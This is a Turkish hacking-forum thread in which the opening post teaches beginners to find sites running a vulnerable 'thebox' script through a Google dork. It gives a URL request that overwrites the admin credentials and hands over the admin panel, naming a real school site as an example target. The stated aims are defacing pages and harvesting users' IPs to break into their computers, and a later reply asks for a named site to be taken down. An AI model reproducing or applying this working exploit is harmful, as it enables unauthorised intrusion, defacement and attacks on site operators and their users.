Site bul yeter

darkness

Üye
10 Ağu 2006
62
0
Selam Arkadaşlar

Bugün sizlere admin paneline sızmayı soru cewap halinde anlatacagım

Soru 1 :

hacker abi admin paneli bizim ne işimize yararki

Cewap1 :

Admin paneli siteyi hacklememizi anasayfasına index basmamıza we kayıtlı kullanıcıların ıp lerini alıp daha sonra pc leine sızmamızı saglar

Soru 2 :
Peki bunu nasıl yaparız EMRE abi
(adım emre belirteyim)
Cewap :
Herkezin bildigi gibi google bizim babamız aşagıda werdigim Kodu googlede aratıyoruz
kodumuz : inurl:thebox/thebox.php

Bunu tarattıktan sonra karşınıza çıkan sitelerden birini açın we browser adres cubugunuzda site adresi şöyle çıkacak(googlede aratınca çıkcak olan herhangi bir siteye girin)
http://www.martin-buber-oberschule.de/thebox/thebox.php (bu site çalışmayabilir ama diyerleri çalışıyor)
burdakı thebox.php silin yerine şunu yapıştırın
/admin.php?act=write&username=CLK-J35&password=111&aduser=CLK-J35&adpass=111

YAPIŞTIRIN sonra sizi gırışe yonlendırecektır

USER:CLK-J35
PASWORD:111

BUNLARI GIRDIKTEN SONRA ADMIN PANELI ELINIZDE

pkk ya hucum koley gele

alıntıdır

mehmethan

Yeni üye
15 Ağu 2006
5
0
slm kardeş peki açılan siteler ne sitesi yani sadece belirli sitelerdemi alıştırma yapacaz daha yeniyim onun için yardımcı olursanız minnetar olurum

emeğine sağlık

tayfa

Yeni üye
29 Tem 2006
3
0
s.a gardeşim bu açık eski bir açık şimdilerde bu açığı kaptmayan site kalmaış yanlış olmasam sadece fırasa sitelerinin bazılarında var ama denemede fayda var paylaşımın için saol gardeşim

tayfa

Yeni üye
29 Tem 2006
3
0
bide arkadaşlar bunu eklemek istiyorum hacklemek için program diye bişey yoktur eğer hack için program falen olsaydı ayakta site kalmazdı bide olsada hack programla deil bilgiyle yapılır

kanunsuz89

Yeni üye
25 Tem 2007
13
0
www.kantinn.net ben üye oldum bir tartışma aramızda geçti solcunun birisi türk bayragına hakaret etti hacker kardeş bu siteyi çökertirsen çok sevinir
herşey vatan için seve seve canımı veririrm şimdiden tşk ederim

zakon007

Yeni üye
16 Ağu 2007
26
0
evet aby coK iyi Bu sana selam Olsun makedoniya turklerden :) inan seninle makedoniya gurur duyuyor sana selam coK iyi sin calISiyor 1 numara ....

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.